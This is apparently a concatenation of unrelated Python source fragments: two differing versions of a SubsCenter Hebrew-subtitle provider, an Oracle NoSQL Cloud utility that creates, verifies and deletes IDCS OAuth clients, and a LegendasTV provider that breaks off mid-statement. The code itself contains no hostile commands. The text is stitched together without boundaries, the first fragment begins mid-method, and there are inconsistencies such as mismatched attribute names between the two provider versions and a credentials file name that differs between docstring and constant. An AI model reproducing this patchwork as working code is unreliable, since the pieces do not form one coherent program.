        self.session.headers['User-Agent'] = 'Subliminal/{}'.format(
            __short_version__)

        # login
        if self.username is not None and self.password is not None:
            logger.debug('Logging in')
            url = self.server_url + 'subscenter/accounts/login/'

            # retrieve CSRF token (a GET sets the csrftoken cookie)
            self.session.get(url)
            csrf_token = self.session.cookies['csrftoken']

            # actual login; a 302 redirect signals success
            data = {
                'username': self.username,
                'password': self.password,
                'csrfmiddlewaretoken': csrf_token
            }
            r = self.session.post(url, data, allow_redirects=False, timeout=10)

            if r.status_code != 302:
                raise AuthenticationError(self.username)

            logger.info('Logged in')
            self.logged_in = True

    def terminate(self):
        # logout
        if self.logged_in:
            logger.info('Logging out')
            r = self.session.get(self.server_url +
                                 'subscenter/accounts/logout/',
                                 timeout=10)
            r.raise_for_status()
            logger.info('Logged out')
            self.logged_in = False

        self.session.close()

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _search_url_titles(self, title):
        """Search the URL titles by kind for the given `title`.

        :param str title: title to search for.
        :return: the URL titles by kind.
        :rtype: collections.defaultdict
        """
        # make the search
        logger.info('Searching title name for %r', title)
        r = self.session.get(self.server_url + 'subtitle/search/',
                             params={'q': title},
                             timeout=10)
        r.raise_for_status()

        # check for redirections: a full redirect chain means a single match
        if r.history and all([h.status_code == 302 for h in r.history]):
            logger.debug('Redirected to the subtitles page')
            links = [r.url]
        else:
            # get the suggestions (if needed)
            soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])
            links = [
                link.attrs['href']
                for link in soup.select('#processes div.generalWindowTop a')
            ]
            logger.debug('Found %d suggestions', len(links))

        # group the url titles by kind (e.g. 'series' / 'movie'),
        # which sits at parts[-3] of each link
        url_titles = defaultdict(list)
        for link in links:
            parts = link.split('/')
            url_titles[parts[-3]].append(parts[-2])

        return url_titles

    def query(self, title, season=None, episode=None):
        # search for the url title
        url_titles = self._search_url_titles(title)

        # episode
        if season and episode:
            if 'series' not in url_titles:
                logger.error('No URL title found for series %r', title)
                return []
            url_title = url_titles['series'][0]
            logger.debug('Using series title %r', url_title)
            url = self.server_url + 'cst/data/series/sb/{}/{}/{}/'.format(
                url_title, season, episode)
            page_link = self.server_url + 'subtitle/series/{}/{}/{}/'.format(
                url_title, season, episode)
        else:
            if 'movie' not in url_titles:
                logger.error('No URL title found for movie %r', title)
                return []
            url_title = url_titles['movie'][0]
            logger.debug('Using movie title %r', url_title)
            url = self.server_url + 'cst/data/movie/sb/{}/'.format(url_title)
            page_link = self.server_url + 'subtitle/movie/{}/'.format(
                url_title)

        # get the list of subtitles
        logger.debug('Getting the list of subtitles')
        r = self.session.get(url)
        r.raise_for_status()
        results = json.loads(r.text)

        # loop over results, nested as language -> ? -> quality -> items
        subtitles = {}
        for language_code, language_data in results.items():
            for quality_data in language_data.values():
                for quality, subtitles_data in quality_data.items():
                    for subtitle_item in subtitles_data.values():
                        # read the item
                        language = Language.fromalpha2(language_code)
                        hearing_impaired = bool(
                            subtitle_item['hearing_impaired'])
                        subtitle_id = subtitle_item['id']
                        subtitle_key = subtitle_item['key']
                        subtitle_version = subtitle_item['h_version']
                        downloaded = subtitle_item['downloaded']
                        release = subtitle_item['subtitle_version']

                        # add the release and increment downloaded count if we already have the subtitle
                        if subtitle_id in subtitles:
                            logger.debug(
                                'Found additional release %r for subtitle %d',
                                release, subtitle_id)
                            bisect.insort_left(subtitles[subtitle_id].releases,
                                               release)  # deterministic order
                            subtitles[subtitle_id].downloaded += downloaded
                            continue

                        # otherwise create it
                        subtitle = SubsCenterSubtitle(
                            language, hearing_impaired, page_link, title,
                            season, episode, title, subtitle_id, subtitle_key,
                            subtitle_version, downloaded, [release])
                        logger.debug('Found subtitle %r', subtitle)
                        subtitles[subtitle_id] = subtitle

        return subtitles.values()

    def list_subtitles(self, video, languages):
        season = episode = None
        title = video.title

        if isinstance(video, Episode):
            title = video.series
            season = video.season
            episode = video.episode

        return [
            s for s in self.query(title, season, episode)
            if s.language in languages
        ]

    def download_subtitle(self, subtitle):
        # download
        url = self.server_url + 'subtitle/download/{}/{}/'.format(
            subtitle.language.alpha2, subtitle.subtitle_id)
        params = {'v': subtitle.subtitle_version, 'key': subtitle.subtitle_key}
        r = self.session.get(url,
                             params=params,
                             headers={'Referer': subtitle.page_link},
                             timeout=10)
        r.raise_for_status()

        # open the zip
        try:
            with zipfile.ZipFile(io.BytesIO(r.content)) as zf:
                # remove some filenames from the namelist
                namelist = [n for n in zf.namelist() if not n.endswith('.txt')]
                if len(namelist) > 1:
                    raise ProviderError('More than one file to unzip')

                subtitle.content = fix_line_ending(zf.read(namelist[0]))
        except zipfile.BadZipfile:
            # if no zip file was retrieved, daily downloads limit has exceeded
            raise ProviderError('Daily limit exceeded')
class SubsCenterProvider(Provider):
    """SubsCenter provider for Hebrew subtitles.

    :param str username: username (optional, must be given with `password`).
    :param str password: password (optional, must be given with `username`).

    """
    languages = {Language.fromalpha2(l) for l in ['he']}
    server = 'http://subscenter.cinemast.com/he/'

    def __init__(self, username=None, password=None):
        # credentials are optional, but must be supplied together
        if username is not None and password is None or username is None and password is not None:
            raise ConfigurationError('Username and password must be specified')

        self.username = username
        self.password = password
        self.logged_in = False

    def initialize(self):
        self.session = Session()
        # update the default headers in place instead of replacing the dict so
        # that requests' standard headers (Accept-Encoding, Connection, ...)
        # are preserved
        self.session.headers['User-Agent'] = 'Subliminal/%s' % get_version(
            __version__)

        # login
        if self.username is not None and self.password is not None:
            logger.debug('Logging in')
            url = self.server + 'subscenter/accounts/login/'

            # retrieve CSRF token first, the login form requires it
            self.session.get(url)
            csrf_token = self.session.cookies['csrftoken']

            # actual login
            data = {'username': self.username, 'password': self.password,
                    'csrfmiddlewaretoken': csrf_token}
            r = self.session.post(url, data, allow_redirects=False, timeout=10)

            # a successful login redirects with a 302
            if r.status_code != 302:
                raise AuthenticationError(self.username)

            logger.info('Logged in')
            self.logged_in = True

    def terminate(self):
        try:
            # logout
            if self.logged_in:
                logger.info('Logging out')
                r = self.session.get(
                    self.server + 'subscenter/accounts/logout/', timeout=10)
                r.raise_for_status()
                logger.info('Logged out')
                self.logged_in = False
        finally:
            # always release the session, even if the logout request failed
            self.session.close()

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _search_url_title(self, title, kind):
        """Search the URL title for the given `title`.

        :param str title: title to search for.
        :param str kind: kind of the title, ``movie`` or ``series``.
        :return: the URL version of the title.
        :rtype: str or None

        """
        # make the search
        logger.info('Searching title name for %r', title)
        r = self.session.get(self.server + 'subtitle/search/',
                             params={'q': title}, allow_redirects=False,
                             timeout=10)
        r.raise_for_status()

        # if redirected, get the url title from the Location header
        if r.is_redirect:
            parts = r.headers['Location'].split('/')

            # check kind
            if parts[-3] == kind:
                return parts[-2]

            return None

        # otherwise, get the first valid suggestion
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])
        suggestions = soup.select('#processes div.generalWindowTop a')
        logger.debug('Found %d suggestions', len(suggestions))
        for suggestion in suggestions:
            parts = suggestion.attrs['href'].split('/')

            # check kind
            if parts[-3] == kind:
                return parts[-2]

    def query(self, series=None, season=None, episode=None, title=None):
        """Query the provider for subtitles.

        Either `series`, `season` and `episode`, or `title` must be given.

        :return: found subtitles, at most one per subtitle id.

        """
        # set the correct parameters depending on the kind
        if series and season and episode:
            url_series = self._search_url_title(series, 'series')
            url = self.server + 'cinemast/data/series/sb/{}/{}/{}/'.format(
                url_series, season, episode)
            page_link = self.server + 'subtitle/series/{}/{}/{}/'.format(
                url_series, season, episode)
        elif title:
            url_title = self._search_url_title(title, 'movie')
            url = self.server + 'cinemast/data/movie/sb/{}/'.format(url_title)
            page_link = self.server + 'subtitle/movie/{}/'.format(url_title)
        else:
            raise ValueError('One or more parameters are missing')

        # get the list of subtitles; timeout added for consistency with every
        # other request this provider makes
        logger.debug('Getting the list of subtitles')
        r = self.session.get(url, timeout=10)
        r.raise_for_status()
        results = json.loads(r.text)

        # loop over results
        subtitles = {}
        for language_code, language_data in results.items():
            for quality_data in language_data.values():
                for quality, subtitles_data in quality_data.items():
                    for subtitle_item in subtitles_data.values():
                        # read the item
                        language = Language.fromalpha2(language_code)
                        hearing_impaired = bool(
                            subtitle_item['hearing_impaired'])
                        subtitle_id = subtitle_item['id']
                        subtitle_key = subtitle_item['key']
                        downloaded = subtitle_item['downloaded']
                        release = subtitle_item['subtitle_version']

                        # add the release and increment downloaded count if we
                        # already have the subtitle
                        if subtitle_id in subtitles:
                            logger.debug(
                                'Found additional release %r for subtitle %d',
                                release, subtitle_id)
                            bisect.insort_left(
                                subtitles[subtitle_id].releases,
                                release)  # deterministic order
                            subtitles[subtitle_id].downloaded += downloaded
                            continue

                        # otherwise create it
                        subtitle = SubsCenterSubtitle(
                            language, hearing_impaired, page_link, series,
                            season, episode, title, subtitle_id, subtitle_key,
                            downloaded, [release])
                        logger.debug('Found subtitle %r', subtitle)
                        subtitles[subtitle_id] = subtitle

        return subtitles.values()

    def list_subtitles(self, video, languages):
        """List subtitles for `video` restricted to `languages`."""
        series = None
        season = None
        episode = None
        title = video.title

        if isinstance(video, Episode):
            series = video.series
            season = video.season
            episode = video.episode

        return [s for s in self.query(series, season, episode, title)
                if s.language in languages]

    def download_subtitle(self, subtitle):
        """Download `subtitle` and set its content."""
        # download
        url = self.server + 'subtitle/download/{}/{}/'.format(
            subtitle.language.alpha2, subtitle.subtitle_id)
        params = {'v': subtitle.releases[0], 'key': subtitle.subtitle_key}
        r = self.session.get(url, params=params,
                             headers={'Referer': subtitle.page_link},
                             timeout=10)
        r.raise_for_status()

        # open the zip
        with zipfile.ZipFile(io.BytesIO(r.content)) as zf:
            # remove some filenames from the namelist
            namelist = [n for n in zf.namelist() if not n.endswith('.txt')]
            if len(namelist) > 1:
                raise ProviderError('More than one file to unzip')

            subtitle.content = fix_line_ending(zf.read(namelist[0]))
class OAuthClient(object):
    """
    Cloud service only.

    Utility to create a custom OAuth client.

    To connect and authenticate to the Oracle NoSQL Database Cloud Service, a
    client needs to acquire an access token from Oracle Identity Cloud Service
    (IDCS). As a prerequisite, a custom OAuth client named *NoSQLClient* must
    be created first using this utility. This custom client needs to be
    created only once for a tenant.

    This utility needs a valid access token in a token file that can be
    downloaded from the IDCS admin console. After logging into the IDCS admin
    console, choose *Applications* from the button on the top left. Find the
    Application named *ANDC*, click the button *Generate Access Token*, in the
    pop-up window, pick *Invoke Identity Cloud Service APIs* under
    *Customized Scopes*. Click on *Download Token* and a token file will be
    generated and downloaded. Note that this token has a lifetime of one hour.

    After the token file has been downloaded, run this utility to complete the
    OAuth Client creation:

    .. code-block:: shell

      python oauth_client.py -create -idcs_url <tenant-specific IDCS URL> \
      -token <token file>

    The tenant-specific IDCS URL is the IDCS host assigned to the tenant.
    After logging into the IDCS admin console, copy the host of the IDCS admin
    console URL. For example, the format of the admin console URL is
    "https\://{tenantId}.identity.oraclecloud.com/ui/v1/adminconsole". The
    "https\://{tenantId}.identity.oraclecloud.com" portion is the required
    parameter.

    After creation, the utility will print out *NoSQLClient is created*. The
    OAuth client id and secret will also be printed out. A credentials file
    template *credentials.tmp* with client id and secret will be generated at
    the working directory by default. Use *-credsdir* to specify a different
    directory.

    This utility also can be used to delete this custom OAuth client in case
    the creation process failed unexpectedly.

    .. code-block:: shell

      python oauth_client.py -delete -idcs_url <tenant-specific IDCS URL> \
      -token <token file>

    In addition, this utility can be used to verify if OAuth client is
    configured properly, for example

    .. code-block:: shell

      python oauth_client.py -verify -idcs_url <tenant-specific IDCS URL> \
      -token <token file>
    """

    #
    # NOTE: above is simple doc. This information is on the implementation.
    # This custom OAuth client must be created with a specified name. The
    # client must:
    # - enable password, client_credentials as allowed grants
    # - have PSM and NDCS fully-qualified scopes (FQS) as allowed scopes
    # - have ANDC_FullAccessRole
    #
    # The OAuth client creation steps are:
    # 1. Find PSM and NDCS primary audiences from IDCS
    # 2. Build PSM and NDCS FQS with primary audiences, put in the OAuth \
    # client JSON payload
    # 3. POST <idcs_url>/admin/v1/Apps with OAuth client JSON payload
    # 4. Find role ID of ANDC_FullAccessRole
    # 5. Grant ANDC_FullAccessRole to created custom OAuth client
    #

    # Default OAuth client name
    _DEFAULT_NAME = 'NoSQLClient'
    # Default credentials template file name
    _CREDS_TMP = 'credentials.temp'
    # Endpoint with filter used to get PSM App
    _PSM_APP_EP = (Utils.APP_ENDPOINT +
                   '?filter=serviceTypeURN+eq+%22PSMResourceTenatApp%22')
    # Endpoint with filter used to get ANDC App
    _ANDC_APP_EP = (Utils.APP_ENDPOINT + '?filter=serviceTypeURN+eq+%22' +
                    'ANDC_ServiceEntitlement%22+and+isOAuthResource+eq+true')
    # Endpoint with filter used to get role ID of ANDC_FullAccessRole
    _ANDC_ROLE_EP = (Utils.ROLE_ENDPOINT +
                     '?filter=displayName+eq+%22ANDC_FullAccessRole%22')
    # Endpoint with filter used to get oauth client
    _CLIENT_EP = Utils.APP_ENDPOINT + '?filter=displayName+eq+%22'
    # JSON used to create custom OAuth client
    _CLIENT = (
        '{{"displayName": "{0}","isOAuthClient": true,' +
        '"isOAuthResource": false,"isUnmanagedApp": true,"active": true,' +
        '"description": "Custom OAuth Client for application access to ' +
        'NoSQL Database Cloud Service","clientType": "confidential",' +
        '"allowedGrants": ["password", "client_credentials"]' +
        ',"trustScope": "Explicit","allowedScopes": [' +
        '{{"fqs": "{1}"}},{{"fqs": "{2}"}}],' +
        '"schemas": ["urn:ietf:params:scim:schemas:oracle:idcs:App"],' +
        '"basedOnTemplate": {{"value": "CustomWebAppTemplateId"}}}}')
    # JSON used to grant role to client
    _GRANT = (
        '{{"app": {{"value": "{0}"}},"entitlement": {{' +
        '"attributeName": "appRoles","attributeValue": "{1}"}},' +
        '"grantMechanism": "ADMINISTRATOR_TO_APP",' +
        '"grantee": {{"value": "{2}","type": "App"}},' +
        '"schemas": ["urn:ietf:params:scim:schemas:oracle:idcs:Grant"]}}')
    # JSON payload used to deactivate an OAuth client before deletion
    _DEACTIVATE = (
        '{"active": false,"schemas": [' +
        '"urn:ietf:params:scim:schemas:oracle:idcs:AppStatusChanger"]}')

    # Main argument flags
    _IDCS_URL_FLAG = '-idcs_url'
    _TOKEN_FILE_FLAG = '-token'
    _CREATE_FLAG = '-create'
    _DELETE_FLAG = '-delete'
    _VERIFY_FLAG = '-verify'
    _NAME_FLAG = '-name'
    _DIR_FLAG = '-credsdir'
    _TIMEOUT_FLAG = '-timeout'
    _VERBOSE_FLAG = '-verbose'

    def __init__(self):
        self._parse_args()
        url = urlparse(self._idcs_url)
        self._host = url.hostname
        # logger used for HTTP request logging
        self._logger = self._get_logger()
        self._logutils = LogUtils(self._logger)
        self._sess = Session()
        self._request_utils = RequestUtils(self._sess, self._logutils)

    def execute_commands(self):
        """Run the command selected on the command line (-create/-delete/
        -verify), always closing the HTTP session afterwards."""
        # noinspection PyBroadException
        try:
            if self._delete:
                self._do_delete()
            elif self._create:
                self._do_create()
            else:
                errors = list()
                self._do_verify(errors)
                if len(errors) != 0:
                    print('Verification failed: ')
                    for err in errors:
                        print(err)
        except Exception:
            print(format_exc())
        finally:
            if self._sess is not None:
                self._sess.close()

    def _add_app(self, auth, payload):
        """Add the custom OAuth client and return its ids and secret."""
        response = self._request_utils.do_post_request(
            self._idcs_url + Utils.APP_ENDPOINT,
            Utils.scim_headers(self._host, auth), payload, self._timeout_ms)
        self._check_not_none(response, 'response of adding OAuth client')
        response_code = response.get_status_code()
        content = response.get_content()
        if response_code == codes.conflict:
            raise IllegalStateException(
                'OAuth Client ' + self._name + ' already exists. To recreate,'
                + ' run with ' + OAuthClient._DELETE_FLAG + '. To verify if ' +
                'existing client is configured correctly, run with ' +
                OAuthClient._VERIFY_FLAG)
        elif response_code >= codes.multiple_choices:
            OAuthClient._idcs_errors(response, 'Adding custom client')
        app_id = 'id'
        oauth_id = 'name'
        secret = 'clientSecret'
        app_id_value = Utils.get_field(content, app_id)
        oauth_id_value = Utils.get_field(content, oauth_id)
        secret_value = Utils.get_field(content, secret)
        if (app_id_value is None or oauth_id_value is None or
                secret_value is None):
            # pass content as a format *argument*, never concatenate it into
            # the template: braces in the response body would break format()
            raise IllegalStateException(
                'Unable to find {0} or {1} or {2} in {3}'.format(
                    app_id, oauth_id, secret, content))
        return OAuthClient.Client(app_id_value, oauth_id_value, secret_value)

    def _check_not_none(self, response, action):
        """Raise IllegalStateException if IDCS returned no response."""
        if response is None:
            raise IllegalStateException(
                'Error ' + action + ' from Oracle Identity Cloud Service, ' +
                'no response')

    def _creds_template(self, client_id, secret):
        """Write the credentials template file and return its path."""
        file_dir = ((path.abspath(path.dirname(argv[0]))
                     if self._temp_file_dir is None else self._temp_file_dir) +
                    sep + OAuthClient._CREDS_TMP)
        if path.exists(file_dir):
            remove(file_dir)
        with open(file_dir, 'w') as f:
            if client_id is not None:
                f.write(PropertiesCredentialsProvider.CLIENT_ID_PROP + '=' +
                        client_id + '\n')
            f.write(PropertiesCredentialsProvider.CLIENT_SECRET_PROP + '=' +
                    secret + '\n')
            f.write(PropertiesCredentialsProvider.USER_NAME_PROP + '=\n')
            f.write(PropertiesCredentialsProvider.PWD_PROP + '=\n')
        return file_dir

    def _deactivate_app(self, auth, app_id):
        """Deactivate the OAuth client identified by `app_id`."""
        # URLs always use '/', not the OS path separator
        response = self._request_utils.do_put_request(
            self._idcs_url + Utils.STATUS_ENDPOINT + '/' + app_id,
            Utils.scim_headers(self._host, auth), OAuthClient._DEACTIVATE,
            self._timeout_ms)
        self._check_not_none(response, 'response of deactivating OAuth client')
        if codes.ok <= response.get_status_code() < codes.multiple_choices:
            return
        OAuthClient._idcs_errors(
            response, 'deactivating OAuth client ' + self._name)

    def _do_create(self):
        """Create the custom OAuth client, grant it the required role and
        write a credentials template file."""
        self._output('Creating OAuth Client ' + self._name)
        try:
            # Find PSM and ANDC fqs
            auth = 'Bearer ' + self._get_bootstrap_token()
            psm_fqs = self._get_psm_audience(auth) + Utils.PSM_SCOPE
            andc = self._get_andc_info(auth)
            andc_fqs = andc.audience + AccessTokenProvider.SCOPE
            self._log_verbose('Found scopes ' + psm_fqs + ', ' + andc_fqs)

            # Add custom client
            add_app = OAuthClient._CLIENT.format(self._name, psm_fqs, andc_fqs)
            client_info = self._add_app(auth, add_app)
            self._log_verbose('Added OAuth client ' + self._name)

            # Find ANDC role id
            role_id = self._get_id(
                auth, self._idcs_url + OAuthClient._ANDC_ROLE_EP, 'role')
            self._log_verbose('Found role id ' + role_id)

            # Grant ANDC_FullAccessRole to custom client
            grant = OAuthClient._GRANT.format(
                andc.app_id, role_id, client_info.app_id)
            self._grant_role(auth, grant)
            self._log_verbose('Granted role to OAuth client')
            self._output(self._name + ' is created\nClient ID: ' +
                         client_info.oauth_id + '\nClient secret: ' +
                         client_info.secret)
            creds_path = self._creds_template(
                client_info.oauth_id, client_info.secret)
            self._output('Credential template file ' + creds_path)
        except Exception as e:
            self._output('Failed to create OAuth client ' + self._name)
            raise e

    def _do_delete(self):
        """Deactivate, then remove, the custom OAuth client."""
        self._output('Deleting OAuth Client ' + self._name)
        try:
            auth = 'Bearer ' + self._get_bootstrap_token()

            # Find OAuth client AppId
            app_id = self._get_id(
                auth,
                self._idcs_url + OAuthClient._CLIENT_EP + self._name + '%22',
                'client')
            self._log_verbose('Found OAuth client AppId: ' + app_id)

            # Deactivate the OAuth client
            self._deactivate_app(auth, app_id)
            self._log_verbose('OAuth client deactivated')

            # Remove the OAuth client
            self._remove_client(auth, app_id)
            self._output(self._name + ' is deleted')
        except Exception as e:
            self._output('Failed to remove OAuth client ' + self._name)
            raise e

    def _do_verify(self, errors):
        """Verify grants, scopes and role of the OAuth client, appending any
        problems found to `errors`."""
        self._output('Verifying OAuth Client ' + self._name)
        try:
            auth = 'Bearer ' + self._get_bootstrap_token()
            response = self._request_utils.do_get_request(
                self._idcs_url + OAuthClient._CLIENT_EP + self._name + '%22',
                Utils.scim_headers(self._host, auth), self._timeout_ms)
            self._check_not_none(response, 'client metadata')
            response_code = response.get_status_code()
            content = response.get_content()
            if response_code >= codes.multiple_choices:
                OAuthClient._idcs_errors(
                    response, 'Getting client ' + self._name)

            grants = Utils.get_field(content, 'allowedGrants')
            if grants is None:
                # No results in response
                raise IllegalStateException(
                    'OAuth Client ' + self._name + ' doesn\'t exist, or the ' +
                    'token file is invalid, user who downloads the token ' +
                    'must have Identity Domain Administrator role')

            # Verify if client has required grants
            self._verify_grants(grants, errors)
            # Verify if client has PSM and ANDC FQS
            self._verify_scopes(
                Utils.get_field(content, 'allowedScopes', 'fqs'), errors)
            # Verify if client has ANDC role
            self._verify_role(
                Utils.get_field(content, 'grantedAppRoles', 'display'),
                errors)
            if len(errors) > 0:
                return
            self._output('Verification succeed')
        except Exception as e:
            self._output('Verification failed of OAuth client ' + self._name)
            raise e

    def _get_andc_info(self, auth):
        """Get App ANDC metadata (app id and audience) from IDCS."""
        response = self._request_utils.do_get_request(
            self._idcs_url + OAuthClient._ANDC_APP_EP,
            Utils.scim_headers(self._host, auth), self._timeout_ms)
        self._check_not_none(response, 'getting service metadata')
        content = response.get_content()
        if response.get_status_code() >= codes.multiple_choices:
            OAuthClient._idcs_errors(response, 'Getting service metadata')
        audience = 'audience'
        app_id = 'id'
        audience_value = Utils.get_field(content, audience)
        app_id_value = Utils.get_field(content, app_id)
        if audience_value is None or app_id_value is None:
            # pass content as a format *argument*, never concatenate it into
            # the template: braces in the response body would break format()
            raise IllegalStateException(
                'Unable to find {0} or {1} in {2}'.format(
                    audience, app_id, content))
        return OAuthClient.ANDC(app_id_value, audience_value)

    def _get_bootstrap_token(self):
        """Read the bootstrap access token from the given token file."""
        with open(self._at_file, 'r') as at_file:
            content = at_file.read()
        bootstrap_token = loads(content)
        field = 'app_access_token'
        app_access_token = bootstrap_token.get(field)
        if app_access_token is None:
            raise IllegalStateException(
                'Access token file contains invalid value: ' + content)
        return app_access_token

    def _get_id(self, auth, url, resource):
        """GET `url` and return the 'id' field of the result."""
        response = self._request_utils.do_get_request(
            url, Utils.scim_headers(self._host, auth), self._timeout_ms)
        self._check_not_none(response, 'getting ' + resource + ' id')
        if response.get_status_code() >= codes.multiple_choices:
            OAuthClient._idcs_errors(response, 'Getting id of ' + resource)
        return str(
            Utils.get_field(response.get_content(), 'id', allow_none=False))

    def _get_logger(self):
        """
        Returns the logger used for OAuthClient.
        """
        logger = getLogger(self.__class__.__name__)
        # -verbose must *lower* the threshold so more is logged; the original
        # had the branches inverted (verbose -> WARNING suppressed output)
        if self._verbose:
            logger.setLevel(INFO)
        else:
            logger.setLevel(WARNING)
        log_dir = (path.abspath(path.dirname(argv[0])) + sep + 'logs')
        if not path.exists(log_dir):
            mkdir(log_dir)
        logger.addHandler(FileHandler(log_dir + sep + 'oauth.log'))
        return logger

    def _get_psm_audience(self, auth):
        """Get the PSM primary audience from IDCS."""
        response = self._request_utils.do_get_request(
            self._idcs_url + OAuthClient._PSM_APP_EP,
            Utils.scim_headers(self._host, auth), self._timeout_ms)
        self._check_not_none(response, 'getting account metadata')
        if response.get_status_code() >= codes.multiple_choices:
            OAuthClient._idcs_errors(response, 'Getting account metadata')
        return str(
            Utils.get_field(
                response.get_content(), 'audience', allow_none=False))

    def _grant_role(self, auth, payload):
        """Grant ANDC_FullAccessRole to the OAuth client."""
        response = self._request_utils.do_post_request(
            self._idcs_url + Utils.GRANT_ENDPOINT,
            Utils.scim_headers(self._host, auth), payload, self._timeout_ms)
        # no leading space: _check_not_none prefixes the action with 'Error '
        self._check_not_none(response, 'response of granting role')
        if codes.ok <= response.get_status_code() < codes.multiple_choices:
            return
        OAuthClient._idcs_errors(
            response, 'Granting required role to client')

    def _log_verbose(self, msg):
        """Print `msg` only when -verbose was given."""
        if self._verbose:
            print(msg)

    def _output(self, msg):
        print(msg)

    def _parse_args(self):
        """Parse and store command line arguments."""
        parser = ArgumentParser(prog='OAuthClient')
        parser.add_argument(OAuthClient._IDCS_URL_FLAG, required=True,
                            help='The idcs_url.',
                            metavar='<tenant-base IDCS URL>')
        parser.add_argument(
            OAuthClient._TOKEN_FILE_FLAG, required=True,
            help='The path of the token get from IDCS admin console.',
            metavar='<access token file path>')
        parser.add_argument(OAuthClient._NAME_FLAG,
                            default=OAuthClient._DEFAULT_NAME,
                            help='The OAuth Client name.',
                            metavar='<client name> default: NoSQLClient')
        parser.add_argument(
            OAuthClient._DIR_FLAG,
            help='The directory for generating the credentials file template.',
            metavar=('<credentials template directory path> ' +
                     'default: current dir'))
        parser.add_argument(OAuthClient._TIMEOUT_FLAG, type=int,
                            default=Utils.DEFAULT_TIMEOUT_MS,
                            help='The timeout.',
                            metavar='<request timeout> default: 12000 ms')
        parser.add_argument(OAuthClient._CREATE_FLAG, action='store_true',
                            help='To create the OAuth Client.')
        parser.add_argument(OAuthClient._DELETE_FLAG, action='store_true',
                            help='To delete the OAuth Client.')
        parser.add_argument(OAuthClient._VERIFY_FLAG, action='store_true',
                            help='To verify the OAuth Client.')
        parser.add_argument(OAuthClient._VERBOSE_FLAG, action='store_true',
                            help='To log verbose information.')

        args = parser.parse_args()
        self._idcs_url = args.idcs_url
        self._at_file = args.token
        self._name = args.name
        self._temp_file_dir = args.credsdir
        self._timeout_ms = args.timeout
        self._create = args.create
        self._delete = args.delete
        self._verify = args.verify
        self._verbose = args.verbose
        if not (self._create or self._delete or self._verify):
            parser.error(
                'Missing required argument ' + OAuthClient._CREATE_FLAG +
                ' | ' + OAuthClient._DELETE_FLAG + ' | ' +
                OAuthClient._VERIFY_FLAG)

    def _remove_client(self, auth, app_id):
        """Delete the (deactivated) OAuth client identified by `app_id`."""
        # URLs always use '/', not the OS path separator
        response = self._request_utils.do_delete_request(
            self._idcs_url + Utils.APP_ENDPOINT + '/' + app_id,
            Utils.scim_headers(self._host, auth), self._timeout_ms)
        self._check_not_none(response, 'response of deleting OAuth client')
        if codes.ok <= response.get_status_code() < codes.multiple_choices:
            return
        OAuthClient._idcs_errors(
            response, 'removing OAuth client ' + self._name)

    def _verify_grants(self, grants, errors):
        """Check that both required grant types are allowed."""
        self._log_verbose('OAuth client allowed grants: ' + str(grants))
        match = 0
        for grant in grants:
            if (grant.lower() == 'password' or
                    grant.lower() == 'client_credentials'):
                match += 1
        if match != 2:
            errors.append(
                'Missing required allowed grants, require Resource ' +
                'Owner and Client Credentials')
        self._log_verbose('Grants verification succeed')

    def _verify_role(self, roles, errors):
        """Check that ANDC_FullAccessRole has been granted."""
        if roles is None:
            raise IllegalStateException(
                'OAuth client ' + self._name + ' doesn\'t have roles')
        self._log_verbose('OAuth client allowed roles: ' + str(roles))
        match = 0
        for role in roles:
            if role == 'ANDC_FullAccessRole':
                match += 1
        if match != 1:
            errors.append('Missing required role ANDC_FullAccessRole')
        self._log_verbose('Role verification succeed')

    def _verify_scopes(self, fqs_list, errors):
        """Check that both PSM and ANDC scopes are allowed."""
        self._log_verbose('OAuth client allowed scopes: ' + str(fqs_list))
        match = 0
        for fqs in fqs_list:
            if Utils.PSM_SCOPE in fqs or AccessTokenProvider.SCOPE in fqs:
                match += 1
        if match != 2:
            errors.append('Missing required OAuth scopes, client only have ' +
                          str(fqs_list))
        self._log_verbose('Scope verification succeed')

    @staticmethod
    def _idcs_errors(response, action):
        Utils.handle_idcs_errors(
            response, action,
            ' Access token in the token file expired,' +
            ' or the token file is generated with incorrect scopes,' +
            ' requires Identity Domain Administrator')

    class ANDC(object):
        """Holder for the ANDC application's id and audience."""

        def __init__(self, app_id, audience):
            self.app_id = app_id
            self.audience = audience

    class Client(object):
        """Holder for the created OAuth client's ids and secret."""

        def __init__(self, app_id, oauth_id, secret):
            self.app_id = app_id
            self.oauth_id = oauth_id
            self.secret = secret
class LegendasTVProvider(Provider):
    """LegendasTV Provider.

    :param str username: username.
    :param str password: password.

    """
    languages = {Language.fromlegendastv(l)
                 for l in language_converters['legendastv'].codes}
    server_url = 'http://legendas.tv/'
    subtitle_class = LegendasTVSubtitle

    def __init__(self, username=None, password=None):
        # Provider needs UNRAR installed. If not available raise
        # ConfigurationError
        try:
            rarfile.custom_check(rarfile.UNRAR_TOOL)
        except rarfile.RarExecError:
            raise ConfigurationError('UNRAR tool not available')

        # credentials are optional, but must be supplied together
        if any((username, password)) and not all((username, password)):
            raise ConfigurationError('Username and password must be specified')

        self.username = username
        self.password = password
        self.logged_in = False
        self.session = None

    def initialize(self):
        self.session = Session()
        self.session.headers['User-Agent'] = \
            'Subliminal/%s' % __short_version__

        # login
        if self.username and self.password:
            logger.info('Logging in')

            data = {'_method': 'POST',
                    'data[User][username]': self.username,
                    'data[User][password]': self.password}
            r = self.session.post(self.server_url + 'login', data,
                                  allow_redirects=False, timeout=10)
            raise_for_status(r)

            soup = ParserBeautifulSoup(r.content, ['html.parser'])
            if soup.find('div', {'class': 'alert-error'},
                         string=re.compile(u'Usuário ou senha inválidos')):
                raise AuthenticationError(self.username)

            logger.debug('Logged in')
            self.logged_in = True

    def terminate(self):
        try:
            # logout
            if self.logged_in:
                logger.info('Logging out')
                r = self.session.get(self.server_url + 'users/logout',
                                     allow_redirects=False, timeout=10)
                raise_for_status(r)
                logger.debug('Logged out')
                self.logged_in = False
        finally:
            # always release the session, even if the logout request failed
            self.session.close()

    @staticmethod
    def is_valid_title(title, title_id, sanitized_title, season, year):
        """Check if is a valid title."""
        sanitized_result = sanitize(title['title'])
        if sanitized_result != sanitized_title:
            logger.debug("Mismatched title, discarding title %d (%s)",
                         title_id, sanitized_result)
            return

        # episode type
        if season:
            # discard mismatches on type
            if title['type'] != 'episode':
                logger.debug(
                    "Mismatched 'episode' type, discarding title %d (%s)",
                    title_id, sanitized_result)
                return

            # discard mismatches on season
            if 'season' not in title or title['season'] != season:
                logger.debug(
